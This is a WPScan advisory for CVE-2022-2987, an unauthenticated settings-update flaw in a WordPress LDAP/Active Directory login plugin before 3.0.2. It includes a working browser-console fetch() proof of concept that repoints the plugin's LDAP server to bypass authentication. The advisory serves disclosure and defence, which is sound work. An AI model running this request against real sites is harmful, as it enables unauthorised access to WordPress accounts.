WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Ldap WP Login / Active Directory Integration < 3.0.2 - Unauthenticated Settings Update to Auth Bypass

Description

The plugin does not have any authorisation and CSRF checks when updating it's settings (which are hooked to the init action), allowing unauthenticated attackers to update them. Attackers could set their own LDAP server to be used to authenticated users, therefore bypassing the current authentication

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user

fetch("/", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ldapConfig&ldapConfig_nonce=-&ldapURI=127.0.0.1&ldapEncrpytMethod=ldap&ldapport=389&ldapDN=user%40localhost&ldappassword=password',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

ldap-wp-login-integration-with-active-directory
Fixed in version 3.0.2 - plugin closed

References

CVE
CVE-2022-2987

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified

Yes

WPVDB ID
0d9638b9-bf8a-474f-992d-2618884d3f67

Timeline

Publicly Published

2022-09-05 (about 8 months ago)

Added

2022-09-05 (about 8 months ago)

Last Updated

2022-09-05 (about 8 months ago)

Our Other Services

WPScan WordPress Security Plugin